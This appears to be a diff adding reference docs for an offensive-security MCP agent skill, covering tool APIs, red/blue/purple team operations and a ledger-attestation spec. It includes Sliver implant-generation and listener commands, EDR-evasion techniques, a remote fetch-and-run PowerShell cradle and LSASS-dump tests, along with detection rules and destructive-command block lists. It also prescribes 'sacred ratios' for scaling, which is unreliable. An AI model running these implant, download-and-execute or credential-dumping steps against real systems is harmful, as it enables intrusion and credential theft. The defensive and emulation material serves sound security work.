| oracle | 2 | `oracle_reason`, `oracle_decide` |
| chain | 1 | `oracle_tactical_chain` (reason→decide→act) |
| recon | 3 | `recon_passive`, `recon_active`, `recon_wifi` |
| agent | 5 | `agent_task`, `agent_list`, `agent_cancel`, `agent_reload_configs`, `agent_config_toggle` |
| mobile | 2 | `mobile_status`, `mobile_execute` |
**Full API:** See `references/api.md`
## Quick Start Sequences
### Health Check
```json
{"tool": "mobile_status", "input": {"include": ["battery", "wifi", "vpn"]}}
{"tool": "mesh_console_ping", "input": {}}
{"tool": "mesh_status", "input": {"include_health": true}}
{"tool": "shield_status", "input": {"include_mesh": true}}
```
### Reason → Decide → Act
```json
{
"tool": "oracle_tactical_chain",
"input": {
"context": "2 unhealthy services, latency elevated",
"constraints": ["read-only", "no destructive actions"],
"objective": "Diagnose and stabilize",
"risk_tolerance": "low",
"dry_run": true
}
}
```
### Passive Reconnaissance
```json
{"tool": "recon_passive", "input": {"target": "example.com", "modules": ["dns", "whois", "certs"]}}
```
### Create Scheduled Agent
```json
{
"tool": "agent_task",
"input": {
"name": "mesh_heartbeat",
"trigger": {"type": "schedule", "interval": 120},
"actions": [{"tool": "mesh_status", "args": {}}, {"tool": "shield_status", "args": {}}],
"on_complete": "log"
}
}
```
## VaultMesh Architecture
VaultMesh operates as a **dual-layer civilization**:
### Layer 1: Kubernetes (The Flesh)
Six organs: 🜄 Governance, 🜂 Automation, 🜃 Treasury, 🜁 Federation, 🜏 Ψ-Field, 🌍 Infrastructure
### Layer 2: Rust Codex (The Soul)
`vm-core`, `vm-cap`, `vm-receipts`, `vm-proof`, `vm-treasury`, `vm-crdt`, `vm-guardian`, `vm-portal`
### Subsystem Spawning
```bash
python3 scripts/spawn_subsystem.py --name threat-analyzer --organ-type psi-field --rust
```
### Multi-Chain Anchoring
```bash
python3 scripts/compute_merkle_root.py --root vaultmesh-architecture --out manifests/hash-manifest.json
bash scripts/multi_anchor.sh manifests/hash-manifest.json
```
**Full VaultMesh details:** See `references/vaultmesh.md`
## Braid Mode — Mutual Attestation
Shield and VaultMesh **braid** by importing foreign Merkle roots:
```json
{"tool": "proof_braid_import", "input": {"url": "http://vaultmesh:9110/api/proof/root", "ledger_name": "vaultmesh"}}
```
| State | Meaning |
|-------|---------|
| none | No foreign roots |
| one_way | Only one side captured |
| bidirectional | Both captured at least one root |
| verified | Bidirectional + no regressions |
| Incident | Severity | Response |
|----------|----------|----------|
| `ROOT_REGRESSION` | CRITICAL | Freeze trust, coordinate with foreign operator |
| `PROOF_COUNT_REGRESSION` | CRITICAL | Same as above |
| `IDENTITY_SHIFT` | CRITICAL | Treat as new ledger unless pre-approved |
**Full braid specification:** See `references/braid.md`
## Red Team Operations
### C2 Frameworks
| Framework | Type | Key Features |
|-----------|------|--------------|
| Cobalt Strike | Commercial | Beacon, Malleable C2, Aggressor |
| Sliver | Open Source | mTLS, WireGuard, multiplayer |
| Havoc | Open Source | Demon agents, stack duplication |
| Brute Ratel C4 | Commercial | EDR evasion, syscall obfuscation |
| Mythic | Open Source | Web UI, multi-agent support |
### Sliver Quick Start
```bash
sliver-server # Start server
generate --mtls 192.168.1.100 --os windows --arch amd64 --save implant.exe
mtls --lhost 0.0.0.0 --lport 8888 # Start listener
```
### Evasion Techniques
- AMSI bypass, ETW patching, unhooking
- Direct syscalls, API hashing
- Sleep obfuscation, stack spoofing
**Full Red Team details:** See `references/redteam.md`
## Blue Team Operations
### DFIR Framework (NIST 800-61r3 + CSF 2.0)
1. **Govern** — IR policies, roles, governance
2. **Identify** — Asset inventory, risk assessment
3. **Protect** — Safeguards, forensic readiness
4. **Detect** — Monitor, anomaly detection, triage
5. **Respond** — Containment, eradication, evidence
6. **Recover** — Restore, lessons learned
### Sigma Rule Development
```yaml
title: LSASS Memory Dump via Procdump
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
level: high
```
### Sigma Conversion
```bash
sigma convert -t splunk -p sysmon rule.yml
sigma convert -t lucene -p ecs_windows rule.yml
```
**Full Blue Team details:** See `references/blueteam.md`
## Purple Team Operations
### Adversary Emulation Frameworks
| Framework | Description |
|-----------|-------------|
| MITRE Caldera | Automated adversary emulation, 527+ procedures |
| Atomic Red Team | 1,225+ tests, 261 techniques, agentless |
| Infection Monkey | Breach simulation, lateral movement |
| PurpleSharp | AD-focused, .NET-based |
### Caldera Setup
```bash
git clone https://github.com/mitre/caldera.git --recursive
pip3 install -r requirements.txt
python3 server.py --insecure # http://localhost:8888
```
### Atomic Red Team Execution
```powershell
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
Invoke-AtomicTest T1003.001 -ShowDetails # LSASS dump
Invoke-AtomicTest T1003.001 -TestNumbers 1
Invoke-AtomicTest T1003.001 -Cleanup
```
### BAS Platforms
- Picus Security, Cymulate, AttackIQ, SafeBreach, XM Cyber
**Full Purple Team details:** See `references/purpleteam.md`
## Specialized Domains
| Domain | Key Topics |
|--------|------------|
| Active Directory | Kerberoasting, DCSync, Golden/Silver tickets, BloodHound |
| Cloud Security | AWS/Azure/GCP misconfigs, CSPM, CNAPP |
| Container/K8s | Pod escape, RBAC abuse, supply chain |
| Mobile Security | Android/iOS testing, Frida, Objection |
| Wireless | WPA3 attacks, rogue AP, deauth |
| Bluetooth/IoT | BLE sniffing, firmware analysis |
| OT/ICS | SCADA, Modbus, IEC 62443 |
| API Security | OWASP API Top 10, GraphQL, JWT |
**Full domain details:** See `references/domains.md`
## Response Patterns
### "Check status" / "What's the health?"
`mobile_status` + `mesh_status` + `shield_status`
### "Analyze this situation"
`oracle_reason` or `oracle_tactical_chain`
### "Run recon on target"
`recon_passive` (DNS/WHOIS) or `recon_active` (requires auth)
### "Test detection for T1003"
→ Atomic Red Team: `Invoke-AtomicTest T1003.001`
### "Write a Sigma rule for X"
→ Generate YAML with logsource/detection/condition
### "Spawn a new subsystem"
`spawn_subsystem.py` with organ type
### "Anchor current state"
`compute_merkle_root.py` + `multi_anchor.sh`
### "Invoke Tem against threat"
`invoke_tem.py` with threat type and remediation
### "Set up C2 infrastructure"
→ Sliver/Cobalt Strike/Havoc setup per `references/redteam.md`
### "Investigate incident"
→ DFIR workflow per `references/blueteam.md`
## Alchemical Transformation Cycle
When the system must evolve:
1. **🜃 Nigredo (Blackening)** — Audit, isolate problems
2. **🜁 Albedo (Whitening)** — Restore from proof, purge invalid data
3. **🜂 Citrinitas (Yellowing)** — Extract patterns, synthesize defenses
4. **🜄 Rubedo (Reddening)** — Deploy improvements, anchor new state
**Triggers:** Threat detection, stagnation, audit findings, upgrade requests
## Tem — The Remembrance Guardian
Invoked when threats are detected. Transmutes attacks into evolutionary catalysts.
**Threat Types:** `integrity-violation`, `capability-breach`, `treasury-exploit`, `dos-attack`, `injection`
```bash
python3 scripts/invoke_tem.py --threat-type integrity-violation --realm demo --auto-remediate
```
## Safety Guardrails
- **tactical_execute:** Risk classification, blocks destructive commands in safe_mode
- **recon_active:** Requires `authorization` parameter
- **All high-impact tools:** Emit cryptographic proofs
- **Braid invariants:** Monotonic time, non-decreasing proof counts
## Forbidden Patterns
**Never:**
- Execute destructive commands without authorization
- Skip proofs for high-impact actions
- Accept regressed roots in braid mode
- Run active recon without auth ticket
- Skip alchemical phases in evolution
**Always:**
- Emit proofs for significant actions
- Respect braid invariants
- Use safe_mode for tactical operations
- Document in LAWCHAIN for governance events
- Apply sacred ratios (φ, π, e) in scaling decisions
## Environment
```bash
VAULTMESH_ENDPOINT=http://100.80.246.127:9090
OLLAMA_HOST=http://localhost:11434
OLLAMA_MODEL=qwen2.5:7b
SOVEREIGN_NODE_ID=shield-01
OFFSEC_MODE=full # full|demo|offline|test
```
## MCP Resources
- `sovereign://node/identity` — Node ID
- `sovereign://mesh/status` — Mesh health
- `sovereign://proofs/log` — Proof log
- `sovereign://agent/tasks` — Agent tasks
- `sovereign://shield/threats` — Threat history
## References
- `references/api.md` — Full MCP tool API (28 tools)
- `references/vaultmesh.md` — Architecture, subsystems, anchoring, Tem
- `references/braid.md` — Mutual attestation specification
- `references/redteam.md` — C2 frameworks, evasion, persistence, OPSEC
- `references/blueteam.md` — DFIR, Sigma rules, detection engineering
- `references/purpleteam.md` — Adversary emulation, BAS, ATT&CK coverage
- `references/domains.md` — AD, cloud, K8s, mobile, wireless, OT/ICS, API

View File

@@ -0,0 +1,387 @@
# OFFSEC-MCP API Reference
**28 tools across 9 categories** — All invoked via MCP `tools/call` with `name` and `arguments`.
---
## 1. Proof Tools (3)
Cryptographic receipts for auditability.
### `proof_generate`
Generate cryptographic proof/receipt for an action.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `action` | string | Yes | Action being proven |
| `data` | object | No | Data to include in proof |
| `witnesses` | string[] | No | Required witnesses |
**Returns:** `{ proof_id, hash, timestamp, action, data }`
### `proof_verify`
Verify a proof/receipt.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `proof_id` | string | No | Proof ID to verify |
| `proof_data` | object | No | Raw proof data |
**Returns:** `{ valid: true/false, proof, reason }`
### `proof_anchor`
Anchor proof to blockchain (simulated).
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `proof_id` | string | Yes | Proof ID to anchor |
| `chain` | string | No | `btc`, `eth`, or `mesh` (default: mesh) |
**Returns:** `{ anchored: true, chain, tx_id }`
---
## 2. Mesh Tools (6)
Prometheus-backed infrastructure intelligence.
### `mesh_console_ping`
Check if VaultMesh/Prometheus is reachable.
**No parameters.** Returns: `{ reachable: true/false, endpoint, latency_ms }`
### `mesh_status`
Get full infrastructure status and health.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include_health` | boolean | No | Include detailed health (default: true) |
**Returns:** `{ services: [...], healthy_count, unhealthy_count, overall_status }`
### `mesh_topology`
Get mesh network topology with health overlay.
**No parameters.** Returns: `{ nodes: [...], edges: [...], service_dependencies }`
### `mesh_alerts`
Get active alerts from mesh.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `severity` | string | No | `all`, `critical`, `warning`, `info` |
**Returns:** `{ alerts: [...], count, by_severity }`
### `mesh_backups`
Get backup status and freshness.
**No parameters.** Returns: `{ backups: [...], last_successful, any_failed }`
### `mesh_blast_radius`
Calculate blast radius for a service failure.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `service_id` | string | Yes | Service to analyze (`portal`, `postgres`, `minio`) |
**Returns:** `{ service_id, affected_services: [...], impact_level }`
---
## 3. Shield Tools (3)
Mesh-aware defensive monitoring.
### `shield_status`
Get defensive shield status with aggregated threat intelligence.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include_mesh` | boolean | No | Include mesh alerts/health (default: true) |
| `include_history` | boolean | No | Include recent threat history (default: false) |
**Returns:** `{ overall_state, mesh_status, threats, monitors, backups }`
### `shield_monitor`
Configure threat monitoring for attack vectors.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `vectors` | string[] | No | `network`, `wifi`, `bluetooth`, `usb`, `process`, `file`, `mesh` |
| `sensitivity` | string | No | `low`, `medium`, `high`, `paranoid` |
| `duration` | number | No | Seconds (0 = indefinite) |
**Returns:** `{ monitoring: true, vectors, sensitivity, expires_at }`
### `shield_respond`
Configure automatic response rules.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `threat_type` | string | Yes | `network_scan`, `mesh_alert`, `process_anomaly` |
| `response` | string | Yes | `log`, `alert`, `block`, `isolate`, `counter`, `trigger_agent` |
| `auto_execute` | boolean | No | Execute without confirmation |
| `notify_mesh` | boolean | No | Broadcast to mesh network |
**Returns:** `{ rule_id, threat_type, response, active: true }`
---
## 4. Tactical Tools (3)
Controlled command execution and playbooks.
### `tactical_execute`
Execute command with risk analysis and optional safe mode.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command to execute |
| `explain` | boolean | No | Explain before execution (default: true) |
| `safe_mode` | boolean | No | Require confirmation for dangerous (default: true) |
| `timeout` | number | No | Timeout in ms (default: 60000) |
**Returns:** `{ command, risk_level, output, stderr, exit_code, proof_id }`
**Blocked in safe_mode:** `rm -rf /`, `dd if=/dev/zero`, `mkfs`, fork bombs
### `tactical_playbook`
Execute a structured sequence of tool calls.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `playbook` | string | Yes | Playbook name or path |
| `variables` | object | No | Variables for playbook |
| `dry_run` | boolean | No | Show without executing (default: false) |
**Built-in:** `quick-recon`, `network-scan`, `mesh-health-check`, `defensive-posture`
**Returns:** `{ playbook, steps: [...], results: [...], overall_success }`
### `tactical_learn`
Record command outcome for future AI suggestions.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command that was executed |
| `context` | string | No | Why this command was useful |
| `outcome` | string | Yes | `success`, `partial`, `failed`, `learned` |
| `tags` | string[] | No | Tags for categorization |
**Returns:** `{ learned: true, command, proof_id }`
---
## 5. Oracle Tools (2)
LLM-backed reasoning with deterministic fallback.
### `oracle_reason`
Analyze situation and recommend actions.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `context` | string | Yes | Situation to reason about |
| `constraints` | string[] | No | Rules to follow |
| `objective` | string | No | Primary goal |
**Returns:** `{ reasoning: { analysis, recommendations: [...], confidence }, proof_id }`
### `oracle_decide`
Make decision based on options and risk tolerance.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `situation` | string | Yes | Situation requiring decision |
| `options` | string[] | Yes | Available options |
| `risk_tolerance` | string | No | `minimal`, `low`, `medium`, `high`, `maximum` |
**Returns:** `{ decision: { selected, reasoning, confidence }, proof_id }`
---
## 6. Chain Tools (1)
End-to-end orchestration pipeline.
### `oracle_tactical_chain`
Full "reason → decide → act" chain with cryptographic proof.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `context` | string | Yes | Situation to analyze |
| `constraints` | string[] | No | Oracle constraints |
| `objective` | string | No | Goal |
| `options` | string[] | No | Decision options (defaults provided) |
| `playbook` | string | No | Playbook if action selected |
| `risk_tolerance` | string | No | Risk level (default: `low`) |
| `dry_run` | boolean | No | Plan only (default: `true`) |
**Returns:**
```json
{
"chain_id": "chain-...",
"reasoning": { "summary": "...", "confidence": 0.8 },
"decision": { "selected": "Run diagnostic", "risk_tolerance": "low" },
"tactical_plan": { "type": "playbook", "executed": false },
"proofs": { "reason": "...", "decide": "...", "chain": "..." }
}
```
---
## 7. Recon Tools (3)
Reconnaissance with guardrails and proof trails.
### `recon_passive`
Passive reconnaissance - no target interaction.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `target` | string | Yes | Domain, IP, or org identifier |
| `modules` | string[] | No | `dns`, `whois`, `certs`, `all` |
**Returns:** `{ type: "passive", target, findings: { dns, whois, certs }, proof_id }`
### `recon_active`
Active reconnaissance - requires authorization.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `target` | string | Yes | IP, domain, or range |
| `scan_type` | string | No | `ports`, `services`, `vuln`, `full` |
| `authorization` | string | Yes | Auth reference (ticket, contract ID) |
| `execute` | boolean | No | Actually run (default: `false` = prepare only) |
**Returns:** `{ type: "active", target, status, command, output (if executed), proof_id }`
### `recon_wifi`
WiFi reconnaissance - environment-aware.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `interface` | string | No | Wireless interface (auto-detected) |
| `mode` | string | No | `scan`, `monitor`, `deauth_detect`, `rogue_detect` |
| `duration` | number | No | Duration in seconds |
**Returns:** `{ type: "wifi", environment: { isTermux, isNetHunter }, findings: { networks }, proof_id }`
---
## 8. Agent Tools (5)
Autonomous background tasks and config management.
### `agent_task`
Create autonomous task with triggers.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `name` | string | Yes | Task name |
| `trigger` | object | Yes | `{ type, interval }` |
| `trigger.type` | string | Yes | `schedule`, `event`, `condition`, `mesh`, `once` |
| `trigger.interval` | number | No | Interval in seconds (for schedule) |
| `actions` | array | Yes | Array of `{ tool, args }` |
| `on_complete` | string | No | `notify`, `mesh_broadcast`, `log`, `chain`, `none` |
| `max_runs` | number | No | Max executions (0 = unlimited) |
**Returns:** `{ success: true, task: {...}, proof_id }`
### `agent_list`
List agent tasks by status.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `status` | string | No | `all`, `active`, `pending`, `completed`, `cancelled`, `disabled` |
**Returns:** `{ count, tasks: [...], stats: { total_tasks, active, pending } }`
### `agent_cancel`
Cancel an active task.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `task_id` | string | Yes | Task ID to cancel |
**Returns:** `{ success: true, task: {...}, proof_id }`
### `agent_reload_configs`
Reload agent configs from `configs/agents/*.yaml`.
**No parameters.** Returns: `{ success: true, config_dir, tasks_loaded: [...], count }`
### `agent_config_toggle`
Enable/disable config-sourced agent at runtime.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `name` | string | Yes | Agent name |
| `enabled` | boolean | Yes | Enable or disable |
| `persist` | boolean | No | Write to YAML file (default: false) |
**Returns:** `{ success: true, name, previous_status, new_status, persisted, proof_id }`
---
## 9. Mobile Tools (2)
Termux/NetHunter body awareness.
### `mobile_status`
Get device status including battery, WiFi, network, VPN.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include` | string[] | No | `battery`, `wifi`, `network`, `vpn`, `location`, `sensors`, `all` |
**Returns:**
```json
{
"environment": { "isTermux": true, "isNetHunter": false, "platform": "android" },
"data": {
"battery": { "percentage": 85, "status": "DISCHARGING" },
"wifi": { "ssid": "Home", "rssi": -65 },
"vpn": { "tailscale": { "connected": true }, "any_connected": true }
},
"assessment": { "status": "healthy", "issues": [], "recommendations": [] },
"proof_id": "..."
}
```
### `mobile_execute`
Execute mobile-specific command with safety guardrails.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command to execute |
| `background` | boolean | No | Run in background (default: false) |
| `timeout` | number | No | Timeout in ms (default: 30000) |
**Blocked:** `rm -rf /`, `dd if=/dev/zero`, `mkfs`, fork bombs
**Returns:** `{ command, risk_level, success, output, proof_id }`
---
## Proof Trail Actions
Every significant tool call emits a cryptographic proof:
| Action Pattern | Tool |
|----------------|------|
| `proof:generate` | proof_generate |
| `mesh:status` | mesh_status |
| `shield:status` | shield_status |
| `tactical:execute` | tactical_execute |
| `oracle:reason` | oracle_reason |
| `oracle:decide` | oracle_decide |
| `chain:oracle_tactical_chain` | oracle_tactical_chain |
| `recon:passive` | recon_passive |
| `recon:active` | recon_active |
| `agent:task:create` | agent_task |
| `agent:config:load` | agent_reload_configs |
| `mobile:status` | mobile_status |
Access proof log via MCP resource: `sovereign://proofs/log`

View File

@@ -0,0 +1,363 @@
# Blue Team Operations Reference
DFIR methodologies, Sigma rules, detection engineering, and forensic analysis.
## NIST SP 800-61r3 + CSF 2.0 Framework
| Function | IR Activities |
|----------|---------------|
| **Govern** | IR policies, roles, governance structures |
| **Identify** | Asset inventory, risk assessment, incident types |
| **Protect** | Safeguards, communication protocols, forensic readiness |
| **Detect** | Monitor, anomaly detection, alert triage |
| **Respond** | Containment, eradication, evidence collection |
| **Recover** | Restore capabilities, lessons learned |
### SANS PICERL Lifecycle
1. **Preparation** — Plans, tools, training
2. **Identification** — Detect and validate
3. **Containment** — Limit damage
4. **Eradication** — Remove threat
5. **Recovery** — Restore operations
6. **Lessons Learned** — Improve
## Chain of Custody
### Requirements
1. Document who collected evidence, when, where
2. Record every transfer of custody
3. Store in tamper-evident containers
4. Use cryptographic hashes (SHA-256)
5. Maintain detailed logs
6. Train personnel on procedures
**Standards:** ISO/IEC 27037:2012, NIST SP 800-86
## Memory Forensics
### Volatility 3 (Python 3)
```bash
# Install
pip install volatility3
# Basic analysis
vol -f memory.raw windows.info
vol -f memory.raw windows.pslist
vol -f memory.raw windows.psscan
vol -f memory.raw windows.netscan
vol -f memory.raw windows.malfind
vol -f memory.raw windows.dlllist
vol -f memory.raw windows.handles
vol -f memory.raw windows.cmdline
vol -f memory.raw windows.filescan
```
### Key Plugins
| Plugin | Purpose |
|--------|---------|
| `windows.pslist` | Active processes via kernel list |
| `windows.psscan` | Find hidden/terminated processes |
| `windows.netscan` | Network connections and sockets |
| `windows.malfind` | Detect code injection |
| `windows.dlllist` | Loaded DLLs per process |
| `windows.handles` | Open handles (files, registry, mutexes) |
| `windows.cmdline` | Command line arguments |
| `windows.hashdump` | Extract password hashes |
### Acquisition Tools
- **DumpIt / WinPMEM** — Windows memory acquisition
- **LiME** — Linux kernel module acquisition
- **AVML** — Rust-based Linux acquisition
- **Belkasoft RAM Capturer** — Bypass anti-dumping
## Disk Forensics
### Tool Comparison
| Tool | Best For | License |
|------|----------|---------|
| Autopsy | Open-source, budget teams | Free |
| EnCase | Law enforcement, court-proven | Commercial |
| FTK | High-volume, email focus | Commercial |
| FTK Imager | Evidence acquisition | Free |
| X-Ways | Portable, power users | Commercial |
### Autopsy Workflow
```bash
# Install
sudo apt install autopsy
# Start
autopsy
# Navigate to http://localhost:9999/autopsy
```
### Sleuth Kit Commands
```bash
# Image info
img_stat image.dd
# File system info
fsstat -o 2048 image.dd
# List files
fls -o 2048 image.dd
# File recovery
icat -o 2048 image.dd <inode> > recovered_file
# Timeline
fls -m "/" -r image.dd > body.txt
mactime -b body.txt > timeline.csv
```
## Velociraptor & KAPE
### Velociraptor
```yaml
# VQL Query Example - Find suspicious processes
SELECT Pid, Name, Exe, CommandLine, CreateTime
FROM pslist()
WHERE Name =~ "powershell|cmd|wscript|cscript"
AND CommandLine =~ "-enc|-e |-nop|-w hidden"
```
### KAPE
```bash
# Triage collection
kape.exe --tsource C: --tdest E:\Collection --target KapeTriage
# With processing
kape.exe --tsource C: --tdest E:\Collection --target KapeTriage --mdest E:\Processed --module !EZParser
```
### KAPE Targets
- `KapeTriage` — Comprehensive Windows triage
- `RegistryHives` — All registry hives
- `EventLogs` — Windows event logs
- `WebBrowsers` — Browser artifacts
- `Antivirus` — AV logs and quarantine
## Sigma Rules
### Rule Structure
```yaml
title: LSASS Memory Dump via Procdump
id: e1a6c9c7-8c8d-4b5c-9a2e-1234567890ab
status: stable
description: Detects LSASS memory dumping using Procdump
references:
- https://attack.mitre.org/techniques/T1003/001/
author: Security Analyst
date: 2024/11/29
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
falsepositives:
- Legitimate troubleshooting
level: high
```
### Sigma CLI
```bash
# Install
pip install sigma-cli pysigma-backend-splunk pysigma-backend-elasticsearch
# Convert to Splunk SPL
sigma convert -t splunk -p sysmon rule.yml
# Convert to Elastic/Lucene
sigma convert -t lucene -p ecs_windows rule.yml
# Batch convert to Elastic Security
sigma convert -t lucene -p ecs_windows -f siem_rule_ndjson ./rules/ -o rules.ndjson
```
### Common Detection Patterns
#### Credential Access
```yaml
title: Mimikatz Sekurlsa
detection:
selection:
CommandLine|contains:
- 'sekurlsa::'
- 'kerberos::'
- 'lsadump::'
condition: selection
```
#### PowerShell Download
```yaml
title: PowerShell Download Cradle
detection:
selection:
CommandLine|contains:
- 'DownloadString'
- 'DownloadFile'
- 'IEX'
- 'Invoke-Expression'
condition: selection
```
#### Scheduled Task Creation
```yaml
title: Suspicious Scheduled Task
detection:
selection:
Image|endswith: '\schtasks.exe'
CommandLine|contains:
- '/create'
filter:
User|contains: 'SYSTEM'
condition: selection and not filter
```
## Critical Windows Event IDs
| Event ID | Category | Description |
|----------|----------|-------------|
| 4624 | Logon | Successful logon (check LogonType) |
| 4625 | Logon | Failed logon |
| 4672 | Logon | Special privileges assigned |
| 4688 | Process | Process creation (enable command line logging) |
| 4697 | Service | Service installed |
| 4698 | Task | Scheduled task created |
| 4720 | Account | User account created |
| 4732 | Group | Member added to local group |
| 5140 | Share | Network share accessed |
| 7045 | Service | Service installed (System log) |
### Logon Types (Event 4624)
| Type | Description |
|------|-------------|
| 2 | Interactive (local) |
| 3 | Network (SMB, etc.) |
| 4 | Batch (scheduled tasks) |
| 5 | Service |
| 7 | Unlock |
| 10 | RemoteInteractive (RDP) |
| 11 | CachedInteractive |
## Threat Hunting with ATT&CK
### Methodology
1. **Develop Hypothesis** — Based on threat intel and risk
2. **Determine Data** — Identify required log sources
3. **Build Analytics** — Create detection queries
4. **Execute Hunt** — Search historical/real-time data
5. **Validate Findings** — Distinguish true/false positives
6. **Document** — Convert to automated detections
### Key Resources
- **ATT&CK Navigator** — Visualize coverage
- **MITRE CAR** — Detection analytics repository
- **Atomic Red Team** — Technique test scripts
- **CALDERA** — Automated adversary emulation
## Timeline Analysis
### Plaso/log2timeline
```bash
# Create timeline
log2timeline.py --storage-file timeline.plaso image.dd
# Filter and output
psort.py -o dynamic -w timeline.csv timeline.plaso
```
### Timesketch
Web-based collaborative timeline analysis:
- Import Plaso timelines
- Search and filter events
- Add annotations and tags
- Share with team
## YARA Rules
### Rule Structure
```yara
rule Mimikatz_Memory {
meta:
description = "Detects Mimikatz in memory"
author = "Security Analyst"
reference = "https://github.com/gentilkiwi/mimikatz"
strings:
$s1 = "sekurlsa" ascii wide
$s2 = "kerberos" ascii wide
$s3 = "gentilkiwi" ascii wide
$s4 = "Benjamin DELPY" ascii wide
condition:
2 of them
}
```
### Usage
```bash
# Scan file
yara rules.yar suspicious_file.exe
# Scan directory
yara -r rules.yar /path/to/scan/
# With Volatility
vol -f memory.raw windows.yarascan --yara-rules="Mimikatz_Memory"
```
## Quick Reference Commands
### Windows
```powershell
# Running processes
Get-Process | Select-Object Id, ProcessName, Path, CommandLine
# Network connections
Get-NetTCPConnection | Where-Object State -eq 'Established'
# Recent files
Get-ChildItem -Path C:\Users -Recurse -Force | Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-1)}
# Scheduled tasks
Get-ScheduledTask | Where-Object State -eq 'Ready'
# Services
Get-Service | Where-Object StartType -eq 'Automatic'
# Event logs
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4624} -MaxEvents 100
```
### Linux
```bash
# Running processes
ps auxf
# Network connections
ss -tulpn
netstat -tulpn
# Recent files
find / -mtime -1 -type f 2>/dev/null
# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
# Auth logs
grep "Accepted\|Failed" /var/log/auth.log
# Login history
last -a
lastlog
```

View File

@@ -0,0 +1,319 @@
# Braid Mode Reference
Mutual attestation protocol between Shield (OFFSEC-MCP) and VaultMesh.
---
## 1. Protocol Overview
Each system periodically imports the other's Merkle root and embeds it in `ROOT.txt`:
```
Shield VaultMesh
│ │
│── import VaultMesh root ──────►│
│ │
│◄────── import Shield root ─────│
│ │
▼ ▼
ROOT.txt: ROOT.txt:
## Foreign Roots ## Foreign Roots
foreign_system: vaultmesh foreign_system: shield
```
**Key property:** To lie about one ledger's past, an attacker must rewrite **both** ledgers (and external anchors).
---
## 2. Foreign Root Schema (v1.0)
### Canonical Fields
| Field | Type | Description |
|-------|------|-------------|
| `ledger_name` | string | Logical name (`vaultmesh`, `shield`) |
| `source_node_id` | string | ID from foreign node |
| `root_hex` | string | 64-char hex SHA256 Merkle root |
| `source_ts` | string | RFC3339 timestamp from foreign |
| `proof_count` | integer | Total proofs at foreign root |
| `captured_at` | string | Local RFC3339 timestamp |
| `proof_id` | string | Local proof ID for import |
| `schema_version` | string | Currently `"1.0"` |
| `source_url` | string | Foreign `/api/root` URL |
### ROOT.txt Section
```text
## Foreign Roots
foreign_roots_schema: 1.0
braid_mode: enabled
### vaultmesh
foreign_system: vaultmesh
foreign_node_id: vm-node-1
foreign_root_hex: a1b2c3d4e5f6...
foreign_root_ts: 2025-11-30T17:45:00.000Z
foreign_proof_count: 142
captured_at: 2025-11-30T17:50:00.000Z
capture_proof_id: proof-abc123
```
---
## 3. Braid Invariants
### Invariant A — Monotonic Foreign Time
For each `(ledger_name, source_node_id)`:
```
source_ts(n+1) > source_ts(n)
```
Violation → `ROOT_REGRESSION`
### Invariant B — Non-decreasing Proof Count
For each `(ledger_name, source_node_id)`:
```
proof_count(n+1) >= proof_count(n)
```
Violation → `PROOF_COUNT_REGRESSION`
### Invariant C — Append-Only Local Log
- No deletion of braid entries
- No rewriting historical records
- Corrections are new entries with `kind: "rejected"`
### Invariant D — Identity Stability
- Change in `source_node_id``IDENTITY_SHIFT`
- Must be handled via policy, not silently accepted
---
## 4. Braid States
| State | Description |
|-------|-------------|
| **none** | No foreign roots captured |
| **one_way** | Only one side has captured |
| **bidirectional** | Both captured at least one root |
| **verified** | Bidirectional + no regressions + anchors match |
| **closed** | Each ROOT.txt referenced in other's history (loop) |
---
## 5. Incident Classes
### ROOT_REGRESSION (CRITICAL)
**Trigger:** Foreign `source_ts` decreased
**Signals:**
- BraidStore: `status: "rejected"`, `warnings: ["ROOT_REGRESSION"]`
- `braid-check` reports regression
**Impact:** Possible rollback, fork, or tampering on foreign side
### PROOF_COUNT_REGRESSION (CRITICAL)
**Trigger:** Foreign `proof_count` decreased
**Signals:** Same as above with `"PROOF_COUNT_REGRESSION"` in warnings
**Impact:** History truncation or rewrite on foreign side
### SCHEMA_INVALID (WARNING)
**Trigger:** Malformed foreign payload (missing fields, bad format)
**Signals:** Import error, `status: "rejected"`, `"SCHEMA_INVALID"` warning
**Impact:** Incompatible or misconfigured foreign node
### NETWORK_ERROR (WARNING → CRITICAL)
**Trigger:** Fetch failure (timeout, refused, TLS/DNS errors)
**Signals:** Import throws, `"NETWORK_ERROR"` warning
**Impact:** Degraded freshness; CRITICAL if sustained
### IDENTITY_SHIFT (CRITICAL)
